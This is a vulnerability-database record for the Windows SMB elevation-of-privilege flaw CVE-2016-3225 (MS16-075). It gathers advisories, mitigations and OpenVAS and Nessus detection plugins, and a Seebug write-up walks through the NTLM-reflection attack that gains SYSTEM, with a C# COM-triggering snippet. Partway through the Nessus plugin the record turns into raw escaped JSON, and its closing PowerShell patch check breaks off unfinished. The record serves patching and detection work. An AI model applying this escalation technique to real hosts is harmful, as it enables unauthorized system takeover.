ID: CVE-2016-3225
Type: cve
Reporter: cve@mitre.org
Modified: 2018-10-12T22:12:00
Description
The SMB server component in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application that forwards an authentication request to an unintended service, aka "Windows SMB Server Elevation of Privilege Vulnerability."
Record
Title: CVE-2016-3225
Bulletin family: NVD
Published: 2016-06-16T01:59:00
Modified: 2018-10-12T22:12:00
Last seen: 2020-10-03T12:10:44 (edition 3, 9 views)
Reporter: cve@mitre.org
NVD entry: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3225
CWE: CWE-264

CVSS v2.0: 6.9 (MEDIUM), vector AV:L/AC:M/Au:N/C:C/I:C/A:C
  Access vector LOCAL, access complexity MEDIUM, authentication NONE; confidentiality, integrity and availability impact all COMPLETE; exploitability score 3.4, impact score 10.0; no user interaction required.
CVSS v3.0: 7.8 (HIGH), vector CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
  Attack vector LOCAL, attack complexity LOW, privileges required NONE, user interaction REQUIRED, scope UNCHANGED; confidentiality, integrity and availability impact all HIGH; exploitability score 1.8, impact score 5.9.
Vulners score: 6.1

References:
- http://www.securitytracker.com/id/1036110
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-075
- https://www.exploit-db.com/exploits/45562/

Affected configurations (CPE 2.3, OR-combined, all marked vulnerable):
- cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*
- cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*

Related entries (dependencies, last refreshed 2020-10-03T12:10:44):
- symantec: SMNTC-91080
- seebug: SSV:93043
- zdt: 1337DAY-ID-31263
- mskb: KB3164038
- mscve: MS:CVE-2016-3225
- openvas: OPENVAS:1361412562310807340
- nessus: SMB_NT_MS16-075.NASL
- metasploit: MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION, MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION_JUICY
- packetstorm: PACKETSTORM:151182, PACKETSTORM:149689
- exploitdb: EDB-ID:45562
- kaspersky: KLA10825, KLA11911
## Symantec: SMNTC-91080

Title: Microsoft Windows Server Message Block CVE-2016-3225 Local Privilege Escalation Vulnerability
Published: 2016-06-14; modified: 2016-06-14; last seen: 2018-03-14T22:40:58
Bulletin family: software
Source: https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/91080
CVSS v2: 6.9, vector AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/

### Description

Microsoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with elevated privileges.

### Technologies Affected

- Microsoft Windows 10 for 32-bit Systems
- Microsoft Windows 10 for x64-based Systems
- Microsoft Windows 10 version 1511 for 32-bit Systems
- Microsoft Windows 10 version 1511 for x64-based Systems
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 7 for x64-based Systems SP1
- Microsoft Windows 8.1 for 32-bit Systems
- Microsoft Windows 8.1 for x64-based Systems
- Microsoft Windows RT 8.1
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2012
- Microsoft Windows Server 2012 R2
- Microsoft Windows Vista SP2
- Microsoft Windows Vista x64 Edition Service Pack 2

### Recommendations

**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.**
To exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.

Updates are available. Please see the references or vendor advisory for more information.

## Seebug: SSV:93043

Title: MS16-075 Windows SMB Server Elevation of Privilege Vulnerability (CVE-2016-3225)
Published: 2017-04-25; modified: 2017-04-25; last seen: 2017-11-19T11:58:04
Bulletin family: exploit
Source: https://www.seebug.org/vuldb/ssvid-93043
CVSS v2: 6.9, vector AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/

### Overview

As we mentioned a number of times throughout our talk, this work is derived directly from James Forshaw's [BlackHat talk](https://www.youtube.com/watch?v=QRpfvmMbDMg) and [Google Project Zero research](https://bugs.chromium.org/p/project-zero/issues/detail?id=325&redir=1). I highly recommend reviewing both of these resources to anyone interested in pursuing this topic.

The idea behind this vulnerability is simple to describe at a high level:

1. Trick the "NT AUTHORITY\SYSTEM" account into authenticating via NTLM to a TCP endpoint we control.
2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the "NT AUTHORITY\SYSTEM" account. This is done through a series of Windows API calls.
3. Impersonate the token we have just negotiated. This can only be done if the attacker's current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

Each of these steps is described in the following 3 sections.

### NTLM Relay to Local Negotiation

NTLM relay from the local "NT AUTHORITY\SYSTEM" (we will just call it SYSTEM for brevity) account back to some other system service has been the theme for the Potato privilege escalation exploits. The first step is to trick the SYSTEM account into performing authentication to some TCP listener we control.

In the original [Hot Potato exploit](https://foxglovesecurity.com/2016/01/16/hot-potato/), we did some complex magic with NBNS spoofing, WPAD, and Windows Update services to trick it into authenticating to us over HTTP. For more information, see the original blog post.

Today, we'll be discussing another method to accomplish the same end goal which James Forshaw discussed [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=325&redir=1). We'll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.

#### Getting Started

We'll be abusing an API call to COM to get this all kicked off. The call is "CoGetInstanceFromIStorage" and to give you some context, here is the relevant code:

```csharp
public static void BootstrapComMarshal()
{
    IStorage stg = ComUtils.CreateStorage();

    // Use a known local system service COM server, in this case BITSv1
    Guid clsid = new Guid("4991d34b-80a1-4291-83b6-3328366b9097");

    TestClass c = new TestClass(stg, String.Format("{0}[{1}]", "127.0.0.1", 6666)); // ip and port

    MULTI_QI[] qis = new MULTI_QI[1];

    qis[0].pIID = ComUtils.IID_IUnknownPtr;
    qis[0].pItf = null;
    qis[0].hr = 0;

    CoGetInstanceFromIStorage(null, ref clsid, null, CLSCTX.CLSCTX_LOCAL_SERVER, c, 1, qis);
}
```

I'm far from being an expert on COM. The "CoGetInstanceFromIStorage" call attempts to fetch an instance of the specified object from a location specified by the caller. Here we are telling COM we want an instance of the BITS object and we want to load it from 127.0.0.1 on port 6666.

It's actually a little more complex than that, because really we're fetching the object from an "IStorage" object, not just passing a host/port directly. In the code above "TestClass" is actually an instance of an IStorage object in which we've replaced some bits and pieces to point back to "127.0.0.1:6666".

#### Man-In-The-Middle

So, now we have COM trying to talk to us on port 6666 where we've spun up a local TCP listener. If we reply in the correct way, we have COM (running as the SYSTEM account) try to perform NTLM authentication with us.

COM is trying to talk to us using the RPC protocol. I'm not particularly fluent in RPC and wouldn't be surprised if there were slight variations based on Windows versions. In order to avoid many headaches, we're going to use a trick in order to craft our replies. What we will do is relay any packets we receive from COM on TCP port 6666 back to the local Windows RPC listener on TCP port 135. Since these packets we're receiving are part of a valid RPC conversation, whatever version of Windows we are running will respond appropriately. We can then use these packets we receive back from Windows RPC on TCP 135 as templates for our replies to COM.

If that's not clear, the following shows the first few packets of this exchange in WireShark:

Notice that the first packet we receive (packet #7) is incoming on port 6666 (our listener, this is COM talking to us). Next, we relay that same packet (packet #9) to RPC on TCP 135. Then in packet #11, we get a reply back from RPC (TCP 135), and in packet #13, we relay that reply to COM.

We simply repeat this process until it's time for NTLM authentication to occur. You can think of these initial packets as just setting the stage for the eventual NTLM auth.

#### NTLM Relay and Local Token Negotiation

Before we dive into the NTLM relay details, let's look at it at a high level. The following is from our slide deck:

On the left in blue are the packets that COM is going to send to us on TCP port 6666. On the right, in red, are the Windows API calls that we're going to make using data that we pull out of those packets.

Let's look a little closer at the API calls on the right, since most people will not be familiar with them. In order to locally negotiate a security token using NTLM authentication, one must first call the function "AcquireCredentialsHandle" to get a handle to the data structure we will need.

Next, we call "AcceptSecurityContext", and the input to this function will be the NTLM Type 1 (Negotiate) message. The output will be an NTLM Type 2 (Challenge) message which is sent back to the client trying to authenticate, in this case, DCOM.

When the client responds with an NTLM Type 3 (Authenticate) message, we then pass that to a second call to "AcceptSecurityContext" to complete the authentication process and get a token.

Let's look at the packet capture and break this all down...

##### Type 1 (Negotiate) Packet

After relaying a few packets between RPC and COM, eventually COM is going to try to initiate NTLM authentication with us by sending the NTLM Type 1 (Negotiate) message, as shown in packet #29 of the packet capture below:

This is where things start to get interesting. Again, we relay this to RPC (on TCP 135), and RPC will reply with an NTLM Challenge.

But there's one more thing going on here that you don't see in the packet capture. When we receive the NTLM Type 1 (Negotiate) message from COM, we rip out the NTLM section of the packet (as shown below), and use it to begin the process of locally negotiating a token:

So, as discussed above, we call "AcquireCredentialsHandle", and then "AcceptSecurityContext", passing as input the NTLM Type 1 (Negotiate) message we pulled out of that packet.

##### NTLM Type 2 (Challenge) Packet

Recall that we forwarded the NTLM Type 1 (Negotiate) packet to RPC on port 135; RPC will now reply with an NTLM Type 2 (Challenge) packet, which can be seen in our packet capture above in packet #33. This time, we do NOT simply forward this packet back to COM; we need to do some work first.

Let's take a closer look at the two NTLM Type 2 (Challenge) packets from the capture above:

Notice the highlighted field "NTLM Server Challenge" and the field below it "Reserved", and that they differ in value. This would not be the case if we had simply forwarded the packet from RPC (on the left) to COM (the one on the right).

Recall that when we made the Windows API call to "AcceptSecurityContext", the output of that call was an NTLM Type 2 (Challenge) message. What we've done here is replace the NTLM blob inside the packet that we are sending to COM with the result of that API call.

Why would we do this? Because we need COM, running as the SYSTEM account, to authenticate using the NTLM challenge and "Reserved" section that we are using to negotiate our local token; if we did not replace this section in the packet, then our call to "AcceptSecurityContext" would fail.

We'll talk more about how local NTLM authentication works later, but for now just know that the client who is trying to authenticate (in this case SYSTEM through COM) needs to do some magic with the "NTLM Server Challenge" and "Reserved" sections of the NTLM Type 2 (Negotiate) packet, and that we'll only get our token if this magic is performed on the values produced by our call to "AcceptSecurityContext".

##### NTLM Type 3 (Authenticate) Packet

So now we've forwarded the modified NTLM Type 2 (Negotiate) packet to COM where the "Challenge" and "Reserved" fields match the output from "AcceptSecurityContext". The "Reserved" field is actually a reference to a SecHandle, and when the SYSTEM account receives the NTLM Type 2 message, it will perform authentication behind the scenes in memory. That is why it is so crucial that we update the "Reserved" field... Otherwise, it would be authenticating to RPC instead of US!

Once this is completed, COM on behalf of the SYSTEM account will send us back the NTLM Type 3 (Authenticate) packet. This will just be empty (because all the actual authentication here happened in memory), but we will use it to make our final call to "AcceptSecurityContext".

We can then call "ImpersonateSecurityContext" with the result of the final call above to get an impersonation token.

### Using the ImpersonationToken

The following diagram (youtube play bar included) from James Forshaw's BlackHat talk ["Social Engineering the Windows Kernel"](https://www.youtube.com/watch?v=QRpfvmMbDMg) shows the pre-requisites to impersonating the token that we have now negotiated:

From this, it is clear that if we want to impersonate the token, we better be running as an account with SeImpersonate privilege (or equivalent). Luckily this includes many service accounts in Windows that penetration testers often end up running as. For example, the IIS and SQL Server accounts.

## OpenVAS: OPENVAS:1361412562310807340

Title: Microsoft Windows SMB Server Elevation of Privilege Vulnerability (3164038)
Published: 2016-06-15; modified: 2020-06-08; last seen: 2020-06-10T19:47:32
Bulletin family: scanner
Source: http://plugins.openvas.org/nasl.php?oid=1361412562310807340
CVSS v2: 6.9, vector AV:L/AC:M/Au:N/C:C/I:C/A:C

Description: This host is missing an important security update according to Microsoft Bulletin MS16-075.

Plugin source (NASL):

```
###############################################################################
# OpenVAS Vulnerability Test
#
# Microsoft Windows SMB Server Elevation of Privilege Vulnerability (3164038)
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.807340");
  script_version("2020-06-08T14:40:48+0000");
  script_cve_id("CVE-2016-3225");
  script_tag(name:"cvss_base", value:"6.9");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)");
  script_tag(name:"creation_date", value:"2016-06-15 10:15:16 +0530 (Wed, 15 Jun 2016)");
  script_tag(name:"qod_type", value:"executable_version");
  script_name("Microsoft Windows SMB Server Elevation of Privilege Vulnerability (3164038)");
  script_tag(name:"summary", value:"This host is missing an important security
  update according to Microsoft Bulletin MS16-075.");

  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");

  script_tag(name:"insight", value:"An elevation of privilege flaw exists
  in the Microsoft Server Message Block (SMB) when an attacker forwards an
  authentication request intended for another service running on the same
  machine.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote
  attackers to execute arbitrary code with elevated permissions.");

  script_tag(name:"affected", value:"- Microsoft Windows 10 x32/x64

  - Microsoft Windows Server 2012

  - Microsoft Windows 8.1 x32/x64

  - Microsoft Windows Server 2012 R2

  - Microsoft Windows 7 x32/x64 Service Pack 1

  - Microsoft Windows Vista x32/x64 Service Pack 2

  - Microsoft Windows Server 2008 R2 x64 Service Pack 1

  - Microsoft Windows Server 2008 x32/x64 Service Pack 2");

  script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"https://support.microsoft.com/en-in/kb/3164038");
  script_xref(name:"URL", value:"https://technet.microsoft.com/library/security/MS16-075");

  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
  script_family("Windows : Microsoft Bulletins");
  script_dependencies("smb_reg_service_pack.nasl");
  script_require_ports(139, 445);
  script_mandatory_keys("SMB/WindowsVersion");

  exit(0);
}

include("smb_nt.inc");
include("secpod_reg.inc");
include("version_func.inc");
include("secpod_smb_func.inc");

if(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2, win8:1,
                   win8x64:1, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){
  exit(0);
}

sysPath = smb_get_system32root();
if(!sysPath ){
  exit(0);
}

# First file checked: the SMB 1.x redirector driver.
sysVer = fetch_file_version(sysPath:sysPath, file_name:"drivers\mrxsmb10.sys");
if(!sysVer){
  exit(0);
}

# Build the human-readable vulnerable range for the report from the version prefix.
if (sysVer =~ "^6\.0\.6002\.1"){
  Vulnerable_range = "Less than 6.0.6002.19431";
}
else if (sysVer =~ "^6\.0\.6002\.2"){
  Vulnerable_range = "6.0.6002.23000 - 6.0.6002.23973";
}
else if (sysVer =~ "^6\.1\.7601\.2"){
  Vulnerable_range = "Less than 6.1.7601.23452";
}
else if (sysVer =~ "^6\.2\.9200\.2"){
  Vulnerable_range = "Less than 6.2.9200.21529";
}
else if (sysVer =~ "^6\.3\.9600\.1"){
  Vulnerable_range = "Less than 6.3.9600.18298";
}
else if (sysVer =~ "^10\.0\.10240"){
  Vulnerable_range = "Less than 10.0.10240.16683";
}
else if (sysVer =~ "^10\.0\.10586"){
  Vulnerable_range = "10.0.10586.0 - 10.0.10586.102";
}

if(hotfix_check_sp(winVista:3, win2008:3) > 0)
{
  if(version_is_less(version:sysVer, test_version:"6.0.6002.19431")||
     version_in_range(version:sysVer, test_version:"6.0.6002.23000", test_version2:"6.0.6002.23973")){
    VULN = TRUE ;
  }
}

else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)
{
  if(version_is_less(version:sysVer, test_version:"6.1.7601.23452")){
    VULN = TRUE ;
  }
}

else if(hotfix_check_sp(win2012:1) > 0)
{
  if(version_is_less(version:sysVer, test_version:"6.2.9200.21529")){
    VULN = TRUE ;
  }
}

else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)
{
  if(version_is_less(version:sysVer, test_version:"6.3.9600.18298")){
    VULN = TRUE ;
  }
}

if(VULN)
{
  report = 'File checked: ' + sysPath + "\drivers\mrxsmb10.sys" + '\n' +
           'File version: ' + sysVer + '\n' +
           'Vulnerable range: ' + Vulnerable_range + '\n' ;
  security_message(data:report);
  exit(0);
}

# Windows 10 is checked through the edgehtml.dll build shipped with the cumulative update.
sysVer = fetch_file_version(sysPath:sysPath, file_name:"edgehtml.dll");
if(!sysVer){
  exit(0);
}

if(hotfix_check_sp(win10:1, win10x64:1) > 0)
{
  if(version_is_less(version:sysVer, test_version:"11.0.10240.16942"))
  {
    Vulnerable_range = "Less than 11.0.10240.16942";
    VULN = TRUE ;
  }
  else if(version_in_range(version:sysVer, test_version:"11.0.10586.0", test_version2:"11.0.10586.419")) {
    Vulnerable_range = "11.0.10586.0 - 11.0.10586.419";
    VULN = TRUE ;
  }
}

if(VULN)
{
  report = 'File checked: ' + sysPath + "\edgehtml.dll" + '\n' +
           'File version: ' + sysVer + '\n' +
           'Vulnerable range: ' + Vulnerable_range + '\n' ;
  security_message(data:report);
  exit(0);
}
```

## Microsoft: MS:CVE-2016-3225

Title: Windows SMB Server Elevation of Privilege Vulnerability
Published: 2016-08-18T07:00:00; modified: 2016-08-18T07:00:00; last seen: 2020-08-07T11:45:28; edition 3
Bulletin family: microsoft
Source: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225
CVSS v2: 6.9, vector AV:L/AC:M/Au:N/C:C/I:C/A:C

An elevation of privilege vulnerability exists in the Microsoft Server Message Block (SMB) when an attacker forwards an authentication request intended for another service running on the same machine. An attacker who successfully exploited this vulnerability could execute arbitrary code with elevated permissions.

To exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.

The update addresses the vulnerability by correcting how Windows SMB handles credential-forwarding requests.

**Enable Extended Protection for Authentication (EPA) for SMB server.**

**For customers running Windows Vista and Windows Server 2008:** You must have update 968389 installed on both client and server computers. To download the update, see [Microsoft Knowledge Base Article 968389](https://support.microsoft.com/en-us/kb/968389). You must also have update 2345886 installed on both client and server computers. If the update is not already installed on your system, you can download it from the [Microsoft Update Catalog](http://catalog.update.microsoft.com/v7/site/Home.aspx). After you install update 2345886, the EPA security feature is off by default as it may cause some application compatibility concerns. To enable EPA for SMB clients and servers, see the References section of [Microsoft Knowledge Base Article 2345886](https://support.microsoft.com/en-us/kb/2345886).

**For customers running Windows 7 and Windows Server 2008 R2:** You must have update 2345886 installed on both client and server computers. If the update is not already installed on your system, you can download it from the [Microsoft Update Catalog](http://catalog.update.microsoft.com/v7/site/Home.aspx). After you install the update, the EPA security feature is off by default as it may cause some application compatibility concerns. To enable EPA for SMB clients and servers, see the References section of [Microsoft Knowledge Base Article 2345886](https://support.microsoft.com/en-us/kb/2345886). Note that the instructions in this article also apply to later releases of Microsoft Windows.

**For customers running Windows 8 and later versions of Windows:** The EPA security feature is built into the operating system, but is off by default as it may cause some application compatibility concerns. To enable EPA for SMB clients and servers, see the References section of [Microsoft Knowledge Base Article 2345886](https://support.microsoft.com/en-us/kb/2345886). Note that the instructions in this article also apply to later releases of Microsoft Windows.

The following [mitigating factors](https://technet.microsoft.com/library/security/dn848375.aspx#Mitigation) may be helpful in your situation: An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.

## Nessus: SMB_NT_MS16-075.NASL

Title: MS16-075: Security Update for Windows SMB Server (3164038)
Published: 2016-06-14; modified: 2021-01-02; last seen: 2021-01-01T05:43:49; edition 29
Bulletin family: scanner
Source: https://www.tenable.com/plugins/nessus/91603
CPE: cpe:/o:microsoft:windows
CVSS v3: 7.8, vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description: The remote Windows host is missing a security update. It is, therefore, affected by an elevation of privilege vulnerability in the Microsoft Server Message Block (SMB) server when handling forwarded credential requests that are intended for another service running on the same host. An authenticated attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions.

Plugin source (NASL; the record is truncated at this point in the source and is reproduced as far as it survives):

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(91603);
  script_version("1.13");
  script_cvs_date("Date: 2019/11/19");

  script_cve_id("CVE-2016-3225");
  script_bugtraq_id(91080);
  script_xref(name:"MSFT", value:"MS16-075");
  script_xref(name:"MSKB", value:"3161561");
  script_xref(name:"MSKB", value:"3163017");
  script_xref(name:"MSKB", value:"3163018");
  script_xref(name:"IAVA", value:"2016-A-0150");

  script_name(english:"MS16-075: Security Update for Windows SMB Server (3164038)");
  script_summary(english:"Checks the version of the SYS files.");

  script_set_attribute(attribute:"synopsis", value:
"The remote Windows host is affected by an elevation of privilege
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Windows host is missing a security update. It is,
therefore, affected by an elevation of privilege vulnerability in the
Microsoft Server Message Block (SMB) server when handling forwarded
credential requests that are intended for another service running
on the same host. An authenticated attacker can exploit this, via a
specially crafted application, to execute arbitrary code with elevated
permissions.");
  script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-075");
  script_set_attribute(attribute:"solution", value:
"Microsoft has released a set of patches for Windows Vista, 2008, 7,
2008 R2, 2012, 8.1, RT 8.1, 2012 R2, and 10.");
  script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-3225");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/06/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/14");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
  script_set_attribute(attribute:"stig_severity", value:"II");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows : Microsoft Bulletins");

  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
  script_require_keys("SMB/MS_Bulletin_Checks/Possible");
  script_require_ports(139, 445, "Host/patch_management_checks");

  exit(0);
}

include("audit.inc");
include("smb_hotfixes_fcheck.inc");
include("smb_hotfixes.inc");
include("smb_func.inc");
include("misc_func.inc");

get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = 'MS16-075';
kbs = make_list(
  "3161561",
  "3163017",
  "3163018"
);

vuln = 0;

if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);

get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

if (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)
  audit(AUDIT_OS_SP_NOT_VULN);

productname = get_kb_item_or_exit("SMB/ProductName", exit_code:1);
if ("Windows 8" >< productname && "Windows 8.1" >!< productname)
  audit(AUDIT_OS_SP_NOT_VULN);


share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);
if (!is_accessible_share(share:share))
  audit(AUDIT_SHARE_FAIL, share);

kb = "3161561";
if (
  # Windows Vista Service Pack 2 / Windows Server 2008
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"srvnet.sys", version:"6.0.6002.19659", min_version:"6.0.6002.18000", dir:"\system32\drivers", bulletin:bulletin, kb:kb) ||
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"srvnet.sys", version:"6.0.6002.23974", min_version:"6.0.6002.20000", dir:"\system32\drivers", bulletin:bulletin, kb:kb) ||

  # Windows 7 / Windows Server 2008 R2
  hotfix_is_vulnerable(os:"6.1", sp:1, file:"srvnet.sys", version:"6.1.7601.23452", min_version:"6.1.7600.16000", dir:"\system32\drivers", bulletin:bulletin, kb:kb) ||

  # Windows Server 2012
  hotfix_is_vulnerable(os:"6.2", sp:0,
```
file:\"srvnet.sys\", version:\"6.2.9200.21860\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srvnet.sys\", version:\"6.3.9600.18340\", min_version:\"6.3.9600.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n vuln++;\n\nkb = \"3163017\";\nif (\n # Windows 10\n hotfix_is_vulnerable(os:\"10\", sp:0, file:\"srvnet.sys\", version:\"10.0.10240.16942\", min_version:\"10.0.10240.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n vuln++;\n\nkb = \"3163018\";\nif (\n # Windows 10 1511\n hotfix_is_vulnerable(os:\"10\", sp:0, file:\"srvnet.sys\", version:\"10.0.10586.420\", min_version:\"10.0.10586.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n vuln++;\n\n\nif (vuln)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:44:44", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3225"], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to the system and runs a specially crafted application.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to the system and runs a specially crafted application.<br/><br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-075\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-075</a>. 
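KB3164038 states that no registry key exists to validate the presence of this update, so the practical local check is the srvnet.sys file version, exactly what the Nessus plugin above does remotely. The PowerShell below is an added example, not code from Tenable, Microsoft or the Vulners record: it reuses the per-OS fixed versions the plugin lists and then reads the SMB server EPA setting that the Microsoft advisory recommends as a mitigation. The registry value name (SmbServerNameHardeningLevel, the "Server SPN target name validation level" policy) and its meaning are an assumption drawn from KB2345886, not from this page, as is the inference that Windows 10 builds newer than 1511 shipped with the fix.

```powershell
function Test-Ms16075Srvnet {
    # Fixed srvnet.sys versions per OS line, copied from the Nessus check above.
    # Min is the lowest version of that servicing branch (GDR vs LDR on Vista/2008).
    $branches = @(
        @{ Min = '6.0.6002.18000'; Fixed = '6.0.6002.19659';  Os = 'Vista SP2 / Server 2008 SP2 (GDR)' },
        @{ Min = '6.0.6002.20000'; Fixed = '6.0.6002.23974';  Os = 'Vista SP2 / Server 2008 SP2 (LDR)' },
        @{ Min = '6.1.7600.16000'; Fixed = '6.1.7601.23452';  Os = 'Windows 7 SP1 / Server 2008 R2 SP1' },
        @{ Min = '6.2.9200.16000'; Fixed = '6.2.9200.21860';  Os = 'Windows Server 2012' },
        @{ Min = '6.3.9600.16000'; Fixed = '6.3.9600.18340';  Os = 'Windows 8.1 / Server 2012 R2' },
        @{ Min = '10.0.10240.0';   Fixed = '10.0.10240.16942'; Os = 'Windows 10 (1507)' },
        @{ Min = '10.0.10586.0';   Fixed = '10.0.10586.420';  Os = 'Windows 10 1511' }
    )

    $sys = Join-Path $env:SystemRoot 'System32\drivers\srvnet.sys'
    $vi  = (Get-Item -LiteralPath $sys).VersionInfo
    # Build the version from the numeric parts: FileVersion is free text and often
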